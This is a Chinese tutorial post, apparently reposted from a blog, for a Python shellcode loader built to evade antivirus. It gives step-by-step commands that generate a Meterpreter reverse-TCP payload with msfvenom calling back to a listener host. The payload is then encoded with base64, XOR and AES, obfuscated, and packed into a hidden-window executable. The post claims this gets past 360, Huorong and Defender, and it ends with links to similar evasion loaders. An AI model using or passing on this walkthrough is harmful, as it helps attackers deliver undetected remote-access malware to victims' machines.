免杀方法(四)Python免杀shellcode加载器
项目作者:HZzz2
项目地址:https://github.com/HZzz2/python-shellcode-loader
一、工具介绍
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES
将python代码缩小并混淆最后生成exe
目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等
二.安装与使用
1.获取项目
git clone https://github.com/HZzz2/python-shellcode-loader.git
cd python-shellcode-loader
pip install -r requirements.txt
2.生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=9999 -f raw > rev.raw
3.base64编码shellcode并替换jiami.py中的值
base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'
4、加密base64并替换main.py中的值
#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'
5.缩小和混淆py代码
缩小python代码
pyminify main.py --output main-mini.py
混淆main-mini.py中的python代码
https://pyob.oxyry.com/ 在线混淆
将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py
6、打包成可执行文件exe
这里需要先安装模块tinyaes
#打包成exe
pyinstaller.exe -Fw -i .setting.ico --key=leslie .main-mini-ob.py
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成。。。。打包好后的可执行程序在dist目录中
免杀结果
免责声明
仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。
所谓宿命,其实都是最好的安排。
免杀方法(四)Python免杀shellcode加载器相关推荐
- 免杀方法(七)c#xor加载器
c#是很流行的编程语言,也可以用它来做一个加载器运行shellcode,生成出来的 文件特别的小,可以很好的投递传输. 项目地址https://github.com/antman1p/ShellCod ...
- 免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader
项目作者:HZzz 项目地址:https://github.com/HZzz2/go-shellcode-loader 一.工具介绍 GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF ...
- ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录 ShellCode_Loader - Msf&Cobal ...
- 【工具分享】免杀360火绒的shellcode加载器
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...
- java 加载shellcode_通用Shellcode加载器
Shellcode加载器是一种基本的规避技术.尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为.例如,很多安全产品可能会在内 ...
- 网络安全进阶篇之免杀(十四章-5) Golang加载器CS免杀国内主流杀软
文章目录 一. 概念 1.1 360 安全卫士和 360 杀毒 1.2 Golang 二.前期准备 2.1 下载地址 三.具体过程 3.1 使用CS生成payload 3.2 免杀过程 3.3 测试 ...
- 网络安全进阶篇之免杀(十四章-7)C#加载器过360
一. 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件.它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀 ...
- shellcode加载器
不能有全局变量 (其实也是使用了绝对地址) 不能使用常量字符串 char szBuffer[] = "ShellCode"; //会使用常量区,所以不可用//写成 char szB ...
- shellcode加载器--从入门到放弃
文章目录 重剑无锋--代码篇复现 1.C/C++(vs2019) (1).指针执行 shellcode放在data段 shellcode放在栈上,复制到堆上 shellcode放在web服务器上 使用 ...
最新文章
- 解决dubbo问题:forbid consumer(2)
- 石嘴山考计算机在哪里报名,石嘴山中考报名系统
- Python3基础 if __name__ == '__main__'
- 深入理解JavaScript之Event Loop
- oozie mysql_【oozie】将oozie的数据库配置为mysql | 学步园
- 文本备份云仓库-python实用脚本下载
- JavaScript获取地址栏中的链接参数
- 程序员必备之电脑护眼模式设置
- Windows系统运行VirtualBox一直出现0x00000000指令引用的0x00000000内存该内存不能为written
- iOS GUI 规范
- 爬虫120例之第17例,用Python面向对象的思路,采集各种精彩句子
- [Ansible系列②]Ansible使用说明
- 十进制数与8421码、5421码、2421码以及余3码之间的部分转换
- Kubernetes API Server 准入控制
- 通过百度地图把经纬度转化成城市名
- Android Glide加载gif
- 新手教程 | 手把手教你 谷歌浏览器如何使用HTTP代理?
- HBase Random Read性能测试
- 浅析丨中国院落文化,打造中式装修风尚!
- 得物APP鞋子包包等商品链接采集--入门版(1)